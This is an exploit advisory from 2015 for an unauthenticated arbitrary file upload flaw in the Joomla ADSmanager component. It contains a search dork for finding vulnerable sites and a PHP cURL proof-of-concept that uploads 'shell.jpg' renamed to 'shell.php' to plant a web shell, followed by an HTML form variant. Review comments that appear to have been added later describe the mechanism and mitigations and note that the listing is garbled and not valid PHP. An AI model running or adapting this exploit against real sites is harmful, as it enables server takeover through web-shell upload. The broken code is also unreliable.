
Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

Author: Back-DOOR , Published: 07-07-2015

# Exploit Title: Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability




    Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org


# Date: 06/07/2015, 04:42 AM

# Exploit Author: Back-DOOR

# Vendor Homepage: www.joomprod.com

# Contact me On My page  : fb.com/BaCkDoOr.HaCkInG

# contact me on my account : fb.com/Backdoor.ma


# Software Link: http://extensions.joomla.org/extension/adsmanager

# Tested on: Kali linux

# Vulnerable File : /index.php?option=com_adsmanager&task=upload&tmpl=component

exploit :

    <?php
    // Proof-of-concept client for the upload endpoint named in the advisory
    // (option=com_adsmanager, task=upload, tmpl=component).
    // NOTE(review): as rendered on this page the listing is not valid PHP
    // (tokens were lost in extraction), so the comments below describe the
    // apparent intent only.
    //
    // Defender view: the script sets no cookie or credential option, which
    // suggests the endpoint is reachable without a session (confirm against
    // the component). In web-server access logs the request shows up as a
    // POST whose query string contains option=com_adsmanager and task=upload.
     
    // Target endpoint; "blabla.com" is the author's placeholder host.
    $url 
"blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component"// put URL Here
    
// Multipart form fields. "file" attaches a local file with an image
// extension (the leading @ is the legacy PHP cURL notation for a file part),
// while "name" separately supplies a .php filename. The mismatch between the
// two is the core of the advisory: presumably the server stores the upload
// under the client-supplied "name" without validating its extension
// (TODO confirm against the component source). Server-side mitigations are an
// extension/content allow-list applied to the final stored name and
// disabling script execution in upload directories.
$post = array
    (
    
"file" => "@shell.jpg",
    
"name" => "shell.php"
    
);
    
// Open a cURL handle for the target URL.
$ch curl_init ("$url");
    
// Return the response body from curl_exec() instead of printing it directly.
curl_setopt ($chCURLOPT_RETURNTRANSFER1);
    
// Follow HTTP redirects issued by the server.
curl_setopt ($chCURLOPT_FOLLOWLOCATION1);
    
// Fixed browser-like User-Agent (Firefox 32 on Windows). The exact string can
// serve as a weak log-hunting hint, but it is trivially changed by the sender.
curl_setopt ($chCURLOPT_USERAGENT"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
    
// Connection timeout value of 5.
curl_setopt ($chCURLOPT_CONNECTTIMEOUT5);
    
// TLS peer-certificate and hostname verification are both switched off, so
// the client accepts any certificate the server presents.
curl_setopt ($chCURLOPT_SSL_VERIFYPEER0);
    
curl_setopt ($chCURLOPT_SSL_VERIFYHOST0);
    
// Send the request as a POST.
curl_setopt ($chCURLOPT_POST1);
    // The @ on the next line suppresses any PHP warning raised while setting
    // the POST body.
    @
curl_setopt ($chCURLOPT_POSTFIELDS$post);
    
// Execute the request and keep the server's response.
$data curl_exec ($ch);
    
curl_close ($ch);
    // Print the raw response; the page does not say what a successful
    // response looks like.
    echo 
$data;
     
    
?>

    #CSRF :
     
    <!-- Browser-form variant of the same upload request. It posts to the same
         task=upload endpoint but uses the field name files[] instead of the
         file/name pair in the PHP listing above; the page does not explain
         the difference. NOTE(review): the form carries no anti-CSRF token
         field, which is presumably why the author labels it CSRF (confirm
         against the component). TARGET is the author's placeholder for the
         site's base URL. -->
    <form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
    enctype="multipart/form-data">
    <input type="file" name="files[]" /><button>Upload</button>
    </form>
